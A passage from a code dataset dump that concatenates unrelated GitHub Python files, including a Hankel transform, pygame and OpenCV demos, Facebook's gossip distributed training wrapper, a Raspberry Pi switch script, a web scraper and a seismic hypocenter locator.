which case \n\t# alpha_k=1.5\n\t# beta_r=-1.5\n\t# mu=.5 \n\t# pf=(2*np.pi)**(-1.5)\n\t\n\tf_k=k**alpha_k*f_k\n\t\n\tr, A=fft_log(k,f_k,q,mu)\n\n\tf_r=pf*A*r**beta_r \n\n\treturn r, f_r \n\t\ndef r_to_k(r,f_r,alpha_k=-1.5, beta_r=1.5, mu=.5, pf=4*pi*np.sqrt(pi/2.),q=0):\n\t\n\t# module to calculate Hankel Transform\n\t# \\int_0^\\infty dr k A(r) J_mu(kr), via fftlog algorithm\n\t# Common application is for correlation function:\n\t# P(k)= 2 pi \\int dr r^2 \\sin(kr)/kr xi(r) \n\t# in which case \n\t# alpha_k=-1.5\n\t# beta_r=1.5\n\t# mu=.5 \n\t# pf=4 pi *sqrt(pi/2)\n\t\n\tf_r=r**beta_r*f_r\n\tk, A=fft_log(r,f_r,q,mu)\n\t\n\tf_k=pf*A*k**alpha_k \n\treturn k, f_k","repo_name":"JoeMcEwen/FAST-PT","sub_path":"fastpt/HT.py","file_name":"HT.py","file_ext":"py","file_size_in_byte":6163,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"77"} +{"seq_id":"35970972562","text":"import pygame\nimport sys\n\n\nclass Button(pygame.sprite.Sprite):\n\n def __init__(self, click_dir, img_dir, x, y, color=pygame.Color(\"navy\")):\n \"\"\"Basic class for buttons.\"\"\"\n super().__init__()\n self.dir = img_dir\n self.img = pygame.image.load(self.dir).convert_alpha()\n self.image = self.img\n clickedimg = pygame.image.load(click_dir).convert_alpha()\n self.clickedimg = clickedimg\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n self.click = pygame.mixer.Sound('./sounds/click.wav')\n\n def hover(self):\n \"\"\"Changes sprites image to hovered image\"\"\"\n self.image = self.clickedimg\n \n def unhover(self):\n \"\"\"Changes sprites image to default image\"\"\"\n self.image = self.img\n \n def check_mouse(self, pos_tuple):\n \"\"\" Checks if the mouse position (pos_tuple) is within the bounds of a button's borders.\n If mouse within bounds, returns True.\"\"\"\n #Tuple of range of x covered by sprite rect\n mouse_x = pos_tuple[0]\n mouse_y = pos_tuple[1]\n x_range = (self.rect.topleft[0], self.rect.topleft[0] + self.img.get_width())\n y_range = (self.rect.topleft[1], self.rect.topleft[1] + self.img.get_height())\n if (mouse_x <= x_range[1]) and (mouse_x >= x_range[0]):\n if (mouse_y <= y_range[1]) and (mouse_y >= y_range[0]):\n return True\n \n def click_sound(self):\n \"\"\"Plays click sound when button is clicked.\"\"\"\n pygame.mixer.Sound.play(self.click)\n","repo_name":"petervanderhook/pyong","sub_path":"models/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38944797082","text":"import scipy.stats as st\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndistribution0 = \"alpha\"\nparams0 = [0.1764, 0.0748, 0.2752]\ndistribution1 = \"johnsonsu\"\nparams1 = [-1.0438, 0.8206, 0.2698, 0.0661]\ndistribution2 = \"johnsonsb\"\nparams2 = [1.1338, 0.5656, 0.2592, 5.0864]\n\n\ndef plot(distribution, params):\n dist = getattr(st, distribution)\n\n loc = params[-2]\n scale = params[-1]\n arg = params[:-2]\n start = dist.ppf(0.01, *arg, loc=loc, scale=scale)\n end1 = dist.ppf(0.99, *arg, loc=loc, scale=scale)\n x = np.linspace(start, end1, 1000)\n y = dist.pdf(x, loc=loc, scale=scale, *arg)\n\n plt.clf()\n plt.plot(x, y, 'b', label=distribution)\n plt.savefig(distribution + \".pdf\", bbox_inches='tight')\n\n\nplot(distribution0, params0)\nplot(distribution1, params1)\nplot(distribution2, params2)\n","repo_name":"Daples/mathematical-engineering","sub_path":"5th-semester/modelling-and-simulation-5/discrete-simulation/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"48334279743","text":"import functools\nimport time\nimport sys\nimport threading\n\nimport torch\nimport torch.distributed as dist\nfrom torch.cuda.comm import broadcast_coalesced, reduce_add_coalesced\nfrom torch.autograd import Variable\nfrom torch.nn.modules import Module\nfrom torch.nn.parallel.replicate import replicate\nfrom torch.nn.parallel.scatter_gather import scatter_kwargs, gather\nfrom torch.nn.parallel.parallel_apply import parallel_apply\n\nfrom .gossiper import PushSum, PushPull\nfrom .graph_manager import NPeerDynamicDirectedExponentialGraph as NPDDEGraph\nfrom .mixing_manager import UniformMixing\nfrom .utils import (\n create_process_group, communicate, flatten_tensors,\n group_by_dtype, make_logger, unflatten_tensors)\n\nHEARTBEAT_TIMEOUT = 300 # maximum time to wait for message (seconds)\n\n\nclass GossipDataParallel(Module):\n \"\"\" Distributed Gossip model wrapper \"\"\"\n\n def __init__(self, module, device_ids=None, rank=None, world_size=None,\n graph=None, mixing=None, comm_device=None, push_sum=True,\n overlap=False, synch_freq=0, verbose=False, use_streams=True,\n nprocs_per_node=1, local_node_group=None):\n super(GossipDataParallel, self).__init__()\n\n # devices available locally\n if device_ids is None:\n device_ids = list(range(torch.cuda.device_count()))\n self.output_device = device_ids[0]\n self.device_ids = device_ids\n\n self.nprocs_per_node = nprocs_per_node\n\n if world_size is None or rank is None:\n assert dist.is_initialized()\n rank = dist.get_rank()\n world_size = dist.get_world_size()\n self.process_rank = rank\n\n if self.nprocs_per_node > 1:\n self.local_rank = self.process_rank % self.nprocs_per_node\n world_size //= nprocs_per_node\n rank //= nprocs_per_node\n if local_node_group is None:\n for node in range(world_size):\n node_processes_ranks = list(\n range(node * self.nprocs_per_node,\n (node + 1) * self.nprocs_per_node))\n # Process group to communicate between processes on this\n # machine\n new_local_group = create_process_group(\n node_processes_ranks)\n if self.process_rank in node_processes_ranks:\n self.local_node_group = new_local_group\n else:\n self.local_node_group = local_node_group\n else:\n self.local_rank = 0\n\n # put model on output device\n self.module = module\n first_param_dtype = next(self.module.parameters()).dtype\n\n # prepare local intra-node all-reduce objects\n if len(self.device_ids) > 1:\n self.broadcast_bucket_size = 10 * 1024 * 1024 # bytes\n self.nccl_reduce_bucket_size = 256 * 1024 * 1024 # bytes\n\n self._module_copies = replicate(self.module, self.device_ids,\n detach=True)\n self._module_copies[0] = self.module\n for cmodule in self._module_copies[1:]:\n for p, cp in zip(self.module.parameters(),\n cmodule.parameters()):\n cp.requires_grad = p.requires_grad\n else:\n self._module_copies = [self.module]\n\n # choose communication device based on backend\n if comm_device is None:\n cpu_comm = True if dist.get_backend() == 'gloo' else False\n comm_device = torch.device('cpu') if cpu_comm else torch.device('cuda')\n self.__cpu_comm = comm_device.type == 'cpu'\n\n if graph is None:\n graph = NPDDEGraph(\n rank, world_size, self.nprocs_per_node, self.local_rank)\n\n if mixing is None:\n mixing = UniformMixing(graph, comm_device)\n\n # distributed backend config\n self.dist_config = {\n 'verbose': verbose,\n 'comm_device': comm_device,\n 'graph': graph,\n 'mixing': mixing,\n 'push_sum': push_sum,\n 'rank': rank,\n 'process_rank': self.process_rank,\n 'world_size': world_size,\n 'cpu_comm': self.__cpu_comm\n }\n self.overlap = overlap\n self.synch_freq = synch_freq\n self.num_updates = 0\n self.asynch = synch_freq > 0\n\n # logger used to print to stdout\n self.logger = make_logger(rank, verbose)\n\n # push-sum weight=1.0 ==> distributed averaging\n self.ps_weight = torch.ones(1, device=comm_device).type(\n first_param_dtype)\n self.nprocs_per_node_device = torch.tensor(\n [self.nprocs_per_node], device=comm_device,\n dtype=first_param_dtype)\n self.is_ps_numerator = False\n\n # prepare parameters for gossip\n self.gossip_enable = True\n self.gossiping = False\n self.params_mixed = True\n self.gossip_ps_factor = torch.zeros(1, device=comm_device).type(\n first_param_dtype)\n self.gossip_ps_weight = self.ps_weight.clone()\n self.gossip_params = []\n self.gossip_device_buffer = []\n for p in module.parameters():\n cp = p.clone().detach_()\n cp = cp.cpu().pin_memory() if self.__cpu_comm else cp.cuda()\n self.gossip_params.append(cp)\n self.gossip_device_buffer.append(cp)\n\n # prepare gossip process control objects\n self.gossip_lock = threading.Lock()\n self.gossip_flag = threading.Event()\n self.train_flag = threading.Event()\n\n if self.dist_config['comm_device'].type != 'cpu' and use_streams:\n self.gossip_stream = torch.cuda.Stream()\n else:\n self.gossip_stream = torch.cuda.current_stream()\n\n if self.process_rank % self.nprocs_per_node == 0:\n self.gossip_thread = threading.Thread(\n target=GossipDataParallel._gossip_target,\n args=(self.dist_config,\n self.gossip_flag,\n self.train_flag,\n self.gossip_lock,\n self.gossip_params,\n self.gossip_device_buffer,\n self.gossip_ps_weight,\n self.gossip_ps_factor,\n self.gossip_stream))\n self.gossip_thread.daemon = True\n self.gossip_thread.name = 'Gossip-Thread'\n self.gossip_thread.start()\n else:\n self.gossip_flag.set()\n # wait for thread to complete initialization\n self.gossip_flag.wait()\n self.gossip_flag.clear()\n # lazy mixing avoids additional bias/de-bias steps\n self.lazy_mixing = (\n not self.asynch and self.dist_config['mixing'].is_regular() and\n not self.overlap)\n self.lazy_ps_factor = self.gossip_ps_factor.clone()\n self.logger.debug('lazy mixing: {}'.format(self.lazy_mixing))\n\n # register ps/grad-reduction hooks\n self.__register_hooks()\n\n def update_gossiper(self, attr, val):\n self.logger.debug('waiting for gossip lock')\n with self.gossip_lock:\n self.logger.debug('gossip lock received')\n for gossiper in self.dist_config['gossipers'].values():\n if val == getattr(gossiper, attr):\n self.logger.debug('nothing to update')\n return\n # update attr\n self.logger.debug('setting gossiper {} to {}'.format(attr, val))\n setattr(gossiper, attr, val)\n\n def state_dict(self, finish_gossip=True):\n # If user is saving the model, complete the gossip to avoid losing\n # the information which has been sent by a peer. If _query_gossip_queue\n # is not called here, it would only be called in the next\n # pre_forward_hook and information sent by the peer will be lost\n # if the checkpoint is restored\n if finish_gossip:\n self._query_gossip_queue()\n\n super_dict = super(GossipDataParallel, self).state_dict()\n supplanted_dict = {'state_dict': super_dict,\n 'ps_weight': self.ps_weight.cpu(),\n 'is_ps_numerator': self.is_ps_numerator}\n return supplanted_dict\n\n def load_state_dict(self, load_dict):\n state_dict = load_dict['state_dict']\n super(GossipDataParallel, self).load_state_dict(state_dict)\n self.ps_weight = load_dict['ps_weight'].to(\n device=self.dist_config['comm_device'])\n self.is_ps_numerator = load_dict['is_ps_numerator']\n\n def forward(self, *inputs, **kwargs):\n \"\"\" Forward pass performed in parallel across all devices on node \"\"\"\n # scatter inputs onto devices\n inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)\n if self.nprocs_per_node > 1:\n self._sync_params_multiprocess()\n if len(self.device_ids) > 1:\n # run forward pass across all devices\n self._sync_params()\n outputs = self.parallel_apply(self._module_copies[:len(inputs)],\n inputs, kwargs)\n return self.gather(outputs, self.output_device)\n else:\n return self.module(*inputs[0], **kwargs[0])\n\n def scatter(self, inputs, kwargs, device_ids):\n return scatter_kwargs(inputs, kwargs, device_ids, dim=0)\n\n def parallel_apply(self, replicas, inputs, kwargs):\n return parallel_apply(replicas, inputs, kwargs,\n self.device_ids[:len(replicas)])\n\n def gather(self, outputs, output_device):\n return gather(outputs, output_device, dim=0)\n\n def _sync_params(self):\n \"\"\" Synchronize parameters across devices (intra-node) \"\"\"\n if len(self.device_ids) <= 1:\n return\n\n # intra-node parameter sync\n params = [p.data for p in self.module.parameters()]\n result = broadcast_coalesced(params, self.device_ids,\n self.broadcast_bucket_size)\n for tensors, module in zip(result[1:], self._module_copies[1:]):\n for tensor, param in zip(tensors, module.parameters()):\n param.data.set_(tensor)\n\n # intra-node buffer sync\n buffers = [b.data for b in self.module.buffers()]\n if len(buffers) > 0:\n result = broadcast_coalesced(buffers, self.device_ids,\n self.broadcast_bucket_size)\n for tensors, module in zip(result[1:], self._module_copies[1:]):\n for tensor, buf in zip(tensors, module.buffers()):\n buf.data.set_(tensor)\n\n def _sync_params_multiprocess(self):\n \"\"\" Synchronize parameters across devices (intra-node) \"\"\"\n # intra-node parameter sync\n params = [p.data for p in self.module.parameters()]\n communication_op = functools.partial(\n dist.broadcast,\n src=(self.dist_config['rank'] * self.nprocs_per_node),\n group=self.local_node_group)\n communicate(params, communication_op)\n\n # intra-node buffer sync\n buffers = [b.data for b in self.module.buffers()]\n if len(buffers) > 0:\n buffers = [b.data for b in self.module.buffers()]\n communication_op = functools.partial(\n dist.broadcast,\n src=(self.dist_config['rank'] * self.nprocs_per_node),\n group=self.local_node_group)\n communicate(buffers, communication_op)\n\n def ps_numerator(self):\n \"\"\" Convert model params to ps-numerator \"\"\"\n if not self.is_ps_numerator:\n ps_weight = self.ps_weight\n if not self.lazy_mixing:\n for p in self.module.parameters():\n p.data.mul_(ps_weight.type(p.data.dtype))\n self.is_ps_numerator = True\n\n def unbias(self):\n \"\"\" Convert moel params to de-biased estimate \"\"\"\n if self.is_ps_numerator:\n ps_weight = self.ps_weight\n if not self.lazy_mixing:\n for p in self.module.parameters():\n p.data.div_(ps_weight.type(p.data.dtype))\n self.is_ps_numerator = False\n\n def train(self, mode=True):\n super(GossipDataParallel, self).train(mode)\n self.gossip_enable = True\n for module in self._module_copies[1:]:\n module.train(mode)\n\n def eval(self):\n super(GossipDataParallel, self).eval()\n self.gossip_enable = False\n for module in self._module_copies[1:]:\n module.eval()\n self._query_gossip_queue(non_blocking=self.asynch)\n\n def block(self):\n self.logger.info('blocking')\n dist.barrier()\n\n def sync_comms(self):\n self._query_gossip_queue(non_blocking=False)\n\n def _query_gossip_queue(self, non_blocking=False):\n \"\"\" Check gossip-queue for push-sum residuals and update model \"\"\"\n if not self.gossip_enable:\n return\n\n self.logger.debug('querying gossip queue')\n\n # no gossip happening right now so just return\n if not self.gossiping:\n if self.process_rank % self.nprocs_per_node == 0:\n self.logger.warning('not gossiping right now')\n return False\n\n if not non_blocking:\n if not self.gossip_flag.wait(timeout=HEARTBEAT_TIMEOUT):\n raise NameError('Gossip flag timeout')\n sys.exit() # HEARTBEAT monitor\n\n # query gossip thread\n if self.gossip_flag.is_set():\n self.logger.debug('received gossip flag')\n\n # atomic gossip was interrupted so try again\n if self.gossip_ps_weight[0] == -1:\n self.gossip_flag.clear()\n self.params_mixed = True\n self.gossiping = False\n self.transfer_params(mix=False)\n return False\n\n self.lazy_ps_factor.copy_(self.gossip_ps_factor)\n\n # convert model-params to ps numerators b4 adding residuals\n self.ps_numerator()\n\n # add residuals\n self.ps_weight += self.gossip_ps_weight\n if self.lazy_mixing:\n self.ps_weight *= self.lazy_ps_factor\n for p, r in zip(self.module.parameters(),\n self.gossip_device_buffer):\n p.data.add_(r)\n if self.lazy_mixing:\n p.data.mul_(self.lazy_ps_factor.type(p.data.dtype))\n\n # update flags\n self.logger.debug('updated ps-weight {}'.format(self.ps_weight))\n self.logger.debug('updated model params')\n self.gossip_flag.clear()\n self.params_mixed = True\n self.gossiping = False\n return True\n\n def transfer_params(self, mix=True):\n \"\"\" Transfers COPY of model parameters to gossip queue \"\"\"\n if (not self.gossip_enable or\n self.process_rank % self.nprocs_per_node != 0):\n return False\n\n self.logger.debug('transfering model params')\n\n # don't transfer new params if old params haven't been mixed yet\n if not self.params_mixed:\n self.logger.warning('params not mixed')\n return False\n\n # using lazy mixing ==> mix on query not transfer\n mix = mix and not self.lazy_mixing\n\n # Transfer ps-numerators to gossip-process:\n # --\n self.ps_numerator()\n if mix:\n self.ps_weight *= self.gossip_ps_factor\n self.gossip_ps_weight.copy_(self.ps_weight)\n # --\n # params gpu-gpu copy (fast)\n # --\n for p, gossip_device_buffer_elem in zip(\n self.module.parameters(), self.gossip_device_buffer):\n if mix:\n p.data.mul_(self.gossip_ps_factor.type(p.data.dtype))\n gossip_device_buffer_elem.data.copy_(p)\n # --\n # buffer to gossip-thread copy (potentially slow, but asynchronous)\n # --\n self.gossip_stream.wait_stream(torch.cuda.current_stream())\n with torch.cuda.stream(self.gossip_stream):\n for b, gp in zip(self.gossip_device_buffer, self.gossip_params):\n gp.copy_(b, non_blocking=True)\n\n # --\n\n # update flags\n self.logger.debug('transfered model params')\n self.params_mixed = False\n self.gossiping = True\n self.train_flag.set()\n return True\n\n @staticmethod\n def _gossip_into_receive_buffer(send_buffer, gossiper, receive_buffer,\n gossip_ps_weight, gossip_lock,\n dist_config):\n # flatten parameters before sending\n out_msg = flatten_tensors(send_buffer)\n\n # send and receive parameters\n with gossip_lock:\n in_msg, ps_weight = gossiper.mix(out_msg, gossip_ps_weight,\n residual=True)\n ps_factor = gossiper.mixing_weights['lo']\n\n # unflatten parameters\n for r, g in zip(unflatten_tensors(in_msg, send_buffer),\n receive_buffer):\n if dist_config['cpu_comm']:\n g.copy_(r, non_blocking=True)\n else:\n g.data.copy_(r)\n\n return ps_weight, ps_factor\n\n @staticmethod\n def _gossip_target(dist_config, gossip_flag, train_flag, gossip_lock,\n gossip_params, gossip_device_buffer,\n gossip_ps_weight, gossip_ps_factor, gossip_stream):\n \"\"\" Gossip thread, which performs push-sum on model params \"\"\"\n logger = make_logger(dist_config['rank'], dist_config['verbose'])\n\n gossip_params_by_dtype = group_by_dtype(gossip_params)\n gossip_device_buffer_by_dtype = group_by_dtype(gossip_device_buffer)\n\n gossipers = {}\n # init gossip instance\n gossiper_class = PushSum if dist_config['push_sum'] else PushPull\n for dtype in gossip_params_by_dtype:\n gossipers[dtype] = gossiper_class(\n flatten_tensors(gossip_params_by_dtype[dtype]),\n device=dist_config['comm_device'],\n graph=dist_config['graph'],\n mixing=dist_config['mixing'],\n rank=dist_config['process_rank'],\n world_size=dist_config['world_size'],\n logger=logger)\n\n dist_config['gossipers'] = gossipers\n gossip_ps_factor.data.copy_(\n gossipers[list(gossipers)[0]].mixing_weights['lo'])\n gossip_flag.set()\n\n # gossip loop\n while True:\n train_flag.wait()\n logger.debug('received train-flag')\n try:\n with torch.cuda.stream(gossip_stream):\n for dtype in gossip_params_by_dtype:\n ps_weight, ps_factor = GossipDataParallel._gossip_into_receive_buffer(\n gossip_params_by_dtype[dtype], gossipers[dtype],\n gossip_device_buffer_by_dtype[dtype],\n gossip_ps_weight, gossip_lock, dist_config)\n gossip_ps_weight.copy_(ps_weight)\n gossip_ps_factor.copy_(ps_factor)\n except RuntimeError as e:\n logger.warning('received runtime error {}'.format(e))\n for gossiper in gossipers.values():\n gossiper.clean_msg_buffers_()\n gossip_ps_weight.fill_(-1)\n finally:\n # Make sure all queued operations are complete\n gossip_stream.synchronize()\n # give main thread go-ahead to read our gossip buffer\n train_flag.clear()\n gossip_flag.set()\n\n def __register_hooks(self):\n \"\"\"\n Registers push-sum de-bias/bias hooks in pre-forward/post-backward\n passes in all leaf modules\n \"\"\"\n self.register_forward_pre_hook(self.__make_forward_pre_hook())\n self.register_backward_hook(self.__make_backward_hook())\n\n def __make_backward_hook(self):\n self.logger.debug('making backward hook')\n\n def hook(*unused):\n # reduce gradients across devices on a single machine\n if len(self.device_ids) > 1:\n\n # collect gradients from all copies\n all_grads = [[] for _ in range(len(self._module_copies))]\n for dev_idx, module in enumerate(self._module_copies):\n for p in module.parameters():\n if not p.requires_grad or p.grad is None:\n continue\n all_grads[dev_idx].append(p.grad.data)\n\n # reduce grads\n reduced_grads = reduce_add_coalesced(\n all_grads, self.output_device,\n self.nccl_reduce_bucket_size)\n\n # update grads with reduced grads\n for grad, reduced in zip(all_grads[0], reduced_grads):\n grad.copy_(reduced)\n\n # clear the gradients and parameters across all replicas\n for module in self._module_copies[1:]:\n for param in module.parameters():\n if param.requires_grad:\n param.grad = None\n param.data.set_()\n\n if self.nprocs_per_node > 1:\n grads = []\n for p in self.module.parameters():\n if not p.requires_grad or p.grad is None:\n continue\n p.grad.data.div_(self.nprocs_per_node_device.type(\n p.grad.data.dtype))\n grads.append(p.grad.data)\n\n communication_op = functools.partial(\n dist.all_reduce, group=self.local_node_group)\n communicate(grads, communication_op)\n\n # convert model back to ps-numerator\n self.ps_numerator()\n\n def queue_hook(*unused):\n Variable._execution_engine.queue_callback(hook)\n return queue_hook\n\n def __make_forward_pre_hook(self):\n self.logger.debug('making forward pre-hook')\n\n def hook(*unused):\n \"\"\" Query gossip queue and de-bias during forward pass \"\"\"\n # gossip during training (not inference)\n if self.gossip_enable:\n non_blocking = self.num_updates < self.synch_freq\n if self._query_gossip_queue(non_blocking):\n self.num_updates = 0\n else:\n self.num_updates += 1\n if self.overlap:\n self.transfer_params()\n\n # convert model to de-biased estimate\n self.unbias()\n\n return hook\n","repo_name":"facebookresearch/stochastic_gradient_push","sub_path":"gossip/distributed.py","file_name":"distributed.py","file_ext":"py","file_size_in_byte":22947,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"77"} +{"seq_id":"22041961568","text":"import os\nfrom celery import Celery\nfrom celery.schedules import crontab\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'volunteer.settings')\n\napp = Celery('volunteer')\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks()\n\napp.conf.beat_schedule = {\n 'send': {\n 'task': 'PersonalArea.tasks.send',\n 'schedule': crontab(minute='*/1'),\n }\n}","repo_name":"gepolis/Ebook3","sub_path":"volunteer/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27403473244","text":"from beforeWords import cantidad_05, fechaEmision_12, fechaEntrega_13, marca_17\nfrom onlyFirst import lote_03, caducidad_04, fechaFabr_14, paisOrigen_16, noElementos\nfrom last import noRemision_01, codigoProd_02, noOrdRep_06, noContrato_07, destino_18, licitacion_19, entidadFed_20\nfrom itertools import repeat\nimport pandas as pd\nimport datetime\n\n\nnoRemision_01 = [element for element, num in zip(noRemision_01, noElementos) for _ in repeat(None, num)]\ncodigoProd_02 = [element for element, num in zip(codigoProd_02, noElementos) for _ in repeat(None, num)]\nnoOrdRep_06 = [element for element, num in zip(noOrdRep_06, noElementos) for _ in repeat(None, num)]\nnoContrato_07 = [element for element, num in zip(noContrato_07, noElementos) for _ in repeat(None, num)]\nfechaEmision_12 = [element for element, num in zip(fechaEmision_12, noElementos) for _ in repeat(None, num)]\nfechaEntrega_13 = [element for element, num in zip(fechaEntrega_13, noElementos) for _ in repeat(None, num)]\ndestino_18 = [element for element, num in zip(destino_18, noElementos) for _ in repeat(None, num)]\nlicitacion_19 = [element for element, num in zip(licitacion_19, noElementos) for _ in repeat(None, num)]\nentidadFed_20 = [element for element, num in zip(entidadFed_20, noElementos) for _ in repeat(None, num)]\n\nvacio = [''] * len(noRemision_01)\n\ndf = pd.DataFrame({'Remision': noRemision_01, \n 'Código de Producto': codigoProd_02, \n 'Lote': lote_03, \n 'Caducidad': caducidad_04, \n 'Cantidad': cantidad_05, \n 'No. Orden de Reposicion': noOrdRep_06, \n 'No. Contrato': noContrato_07, \n 'Proveedor': vacio,\n 'Precio de Compra': vacio,\n 'IVA': vacio,\n 'Tipo de Moneda': vacio,\n 'Fecha de emision': fechaEmision_12, \n 'Fecha máxima de entrega': fechaEntrega_13, \n 'Fecha de Fabricación': fechaFabr_14, \n 'Registro Sanitario': vacio,\n 'País de Origen' : paisOrigen_16, \n 'Marca': marca_17, \n 'Destino': destino_18, \n 'Licitación': licitacion_19, \n 'Entidad Federativa': entidadFed_20})\n\nfecha = datetime.datetime.now().strftime(\"%Y-%m-%d\")\ndf.to_excel(f'output {fecha}.xlsx', index=False)\n\n\n\n\n\n","repo_name":"rojasfuentes/parserGobierno","sub_path":"Scripts/toParser.py","file_name":"toParser.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30638709227","text":"# 백준 단계별 풀이 9단계 - 소수\n# https://www.acmicpc.net/problem/2581\n\n# m = int(input())\n# n = int(input())\n# case = []\n\n# for i in range(m, n + 1):\n# yaksoo = 0\n# for j in range(1, i + 1):\n# if i % j == 0: \n# yaksoo += 1\n# if yaksoo > 2: # 시간 초과를 막기위함.\n# break\n# if yaksoo == 2: \n# case.append(i)\n\n# if len(case) > 0:\n# print(sum(case))\n# print(min(case))\n# else:\n# print(-1)\n\n#############################3\n\ndef YaksooList(start, end):\n case = []\n for i in range(start, end + 1):\n yaksoo = 0\n for j in range(1, i + 1):\n if i % j == 0: \n yaksoo += 1\n if yaksoo > 2: # 시간 초과를 막기위함.\n break\n if yaksoo == 2: \n case.append(i)\n return case\n\n\nm = int(input())\nn = int(input())\nresult = YaksooList(m, n)\n\nif len(result) > 0:\n print(sum(result))\n print(min(result))\nelse:\n print(-1)\n\n","repo_name":"devraphy/algorithm","sub_path":"baekjoon/step9_math2/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7966057798","text":"# BITWISE_NOT operation on images\r\n\r\nfrom cv2 import cv2\r\nimport numpy as np\r\n\r\nimg1 = cv2.imread(\"b_w.png\")\r\n\r\nimg2 = np.zeros((184, 307, 3), dtype=np.uint8) # Creating a black image\r\nimg2 = cv2.rectangle(img2, (100,10), (200,100), (255,255,255), -1) # Making a white rectangle inside the black box\r\n\r\nbit_not = cv2.bitwise_not(img2)\r\n\r\ncv2.imshow('IMG1 Window', img1)\r\ncv2.imshow('IMG2 Window', img2)\r\n\r\n\r\ncv2.imshow('IMG2 NOT Window', bit_not) # Resultant window\r\n\r\nif cv2.waitKey(0) == 27:\r\n cv2.destroyAllWindows()","repo_name":"vaibhavcodes/OpenCV","sub_path":"18_bitwise_not.py","file_name":"18_bitwise_not.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20516502918","text":"import time\nfrom RailSwitch import *\n\nSW1_PIN = 14\nSW2_PIN = 15\nLED_PIN = 18\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LED_PIN, GPIO.OUT)\nGPIO.output(LED_PIN, GPIO.LOW)\nsw1 = RailSwitch(SW1_PIN)\nsw2 = RailSwitch(SW2_PIN)\n\ntry:\n while(True):\n if (sw1.is_pushed()):\n GPIO.output(LED_PIN, GPIO.HIGH)\n if (sw2.is_pushed()):\n GPIO.output(LED_PIN, GPIO.LOW)\n time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n print(\"break\")\n GPIO.cleanup()\n\n","repo_name":"hajimef/plarail_switch_raspi","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72463833209","text":"\r\n\r\nimport os\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\n\r\ndef title1():\r\n title = soup.title.string\r\n return title\r\n\r\ndef images(url):\r\n images = soup.findAll('img')\r\n for eachimage in images:\r\n try:\r\n imgURL = eachimage['src']\r\n print(imgURL)\r\n if imgURL[0:4] != 'http':\r\n imgURL = url+imgURL\r\n #dealing with the path\r\n response = requests.get(imgURL)\r\n imageName = os.path.basename(imgURL)\r\n\r\n with open(imageName, 'wb') as outFile:\r\n outFile.write(response.content)\r\n except Exception as err:\r\n print(imgURL, err)\r\n continue\r\n\r\ndef urlsScrape():\r\n siteLinks = set()\r\n base = url\r\n links = soup.findAll('a')\r\n for each in links:\r\n new = each.get('href')\r\n if not new:\r\n continue\r\n if 'http' not in new:\r\n new = base+new\r\n if not base in new:\r\n continue\r\n if new not in siteLinks:\r\n siteLinks.add(new)\r\n for entry in siteLinks:\r\n print(entry)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n '''Main program'''\r\n try:\r\n url = 'website'\r\n page = requests.get(url) # retrieve web-page\r\n soup = BeautifulSoup(page.text, 'html.parser')\r\n print('\\n\\n The website we are scraping is', url)\r\n print('\\n\\n The title of the page is', title1())\r\n print('\\n\\n Extracting Images from website and storing them in', os.getcwd())\r\n images(url)\r\n print('\\n\\nHere are some urls from the website')\r\n urlsScrape()\r\n except Exception as err:\r\n print(err)\r\nprint('\\n\\nScript is done')\r\n\r\n#%%\r\n","repo_name":"wildcatjesse/Projects","sub_path":"GarciaJ_Scripting-Assignment9.py","file_name":"GarciaJ_Scripting-Assignment9.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43467311227","text":"import os\nfrom glob import glob\nfrom pathlib import Path\nfrom shutil import copy\n\nfrom core.Catalog import catalog2xyzm\nfrom core.Magnitude import setMagnitude\nfrom tqdm import tqdm\nfrom obspy import read_events\n\nfrom hypocenter.Station import toSTATION0HYP\n\n\ndef locateHypocenter(config):\n locationPath = os.path.join(\"results\", \"location\", \"hypocenter\")\n Path(locationPath).mkdir(parents=True, exist_ok=True)\n cmd = \"cat results/*_*.out > results/all.out\"\n os.system(cmd)\n catalog = read_events(os.path.join(\"results\", \"all.out\"))\n toSTATION0HYP(config, catalog)\n catalogs = glob(os.path.join(\"results\", \"all.out\"))\n desc = \"+++ Locate catalog using 'Hypocenter' ...\"\n for catalogFile in tqdm(catalogs, desc=desc):\n copy(catalogFile, locationPath)\n copy(os.path.join(\"files\", \"select.inp\"), locationPath)\n copy(os.path.join(\"results\", \"STATION0.HYP\"), locationPath)\n root = os.getcwd()\n os.chdir(locationPath)\n with open(\"hyp.inp\", \"w\") as f:\n f.write(\"all.out\\nn\\n\")\n cmd = \"hyp < hyp.inp >/dev/null 2>/dev/null\"\n os.system(cmd)\n catalog2xyzm(config, \"hyp.out\", \"hypocenter\")\n cmd = \"select select.inp >/dev/null 2>/dev/null\"\n os.system(cmd)\n 